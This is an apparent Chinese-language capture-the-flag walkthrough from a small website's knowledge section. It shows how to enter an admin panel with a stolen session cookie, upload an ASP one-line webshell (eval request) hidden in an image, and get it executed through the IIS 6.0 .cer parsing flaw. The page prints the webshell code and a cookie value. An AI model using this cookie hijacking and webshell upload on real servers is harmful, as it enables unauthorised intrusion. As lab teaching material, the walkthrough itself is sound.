logo

哈达波斯网|专注网站

知识文档

Get Shell绕过防护上传木马

知识文档  2019/9/2 15:24:09  管理员  

01.jpg
看了题目和Tips,这题是需要我们用上一题窃取的cookie来登录后台然后上传WEBSHELL,然后连接菜刀获取flag。


先找到上一题打来的cookie。

02.jpg


ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC


然后按F12选择Application,然后看右边有一个cookies然后选择我们的题目的地址,然后点击空白的地方,


把ADMINSESSIONIDCSTRCSDQ粘贴在Name下LBMLMBCCNPFINOANFGLPCFBC粘贴在value


(浏览器可能会有差异,我是谷歌浏览器,不懂可以百度下非常简单)

03.jpg


然后点准备好了吗或者F5刷新页面,成功进入

04.jpg

然后我们直接找上传点,毕竟getshell我们是需要在服务器的WWW文件夹里面放一段恶意代码的。


我们先去百度找ASP一句话木马,因为是ASP的环境


ASP一句话木马:<%eval request ("pass")%> 密码是pass eval是个函数,request是接受参数的。有兴趣了解一句话的可以自行百度或者私聊我。


一般而言直接传木马文件都很可能被拦截,所以一般而言一句话木马都会做成图片马。图片马制作非常简单,一条CMD命令就可以了


具体的可以去https://jlasp.com/zhishiwendang/3_385.html   查看 然后我们成功的得到了图片马


找到上传点

05.jpg

我们修改产品管理里面的产品

06.jpg

文件存在然后上菜刀。菜刀打开右键添加,地址就写文件地址,边上的框框写密码,我的就是pass,记得选择脚本格式

07.jpg


然后我们双击去访问,丢了一个405报错。这是因为jpg文件不解析,因为你的后缀是图片格式,所以服务器会当做一张图片去读取,而不是代码。


就和你把一个图片后缀改为TXT然后打开里面的东西都会当文本读取而不是图片。


报错信息里面写了iis6.0的中间件。百度下iis6.0的解析漏洞,就能发现上传cer文件,iis6.0会解且执行。


然后把图片马名字改为cer上传,成功上传,然后菜刀连接,成功进入,然后滚轮划一下就能看到flag!.txt,然后双击打开就是flag了。


08.jpg



网站首页  | 最新公告  | 漏洞修补  | 网站模板  | 知识文档  | 与我联系
Copyright © 2015 jlasp.com All Rights Reserved.
哈达波斯网|专注网站 版权所有
地址:吉林省吉林市昌邑区 联系QQ:383612004 联系人:董先生
未经本站授权,禁止复制或建立镜像,内容仅用于学习参考!
ICP备案号:吉ICP备15000891号-1 | 

吉公网安备 22020202000301号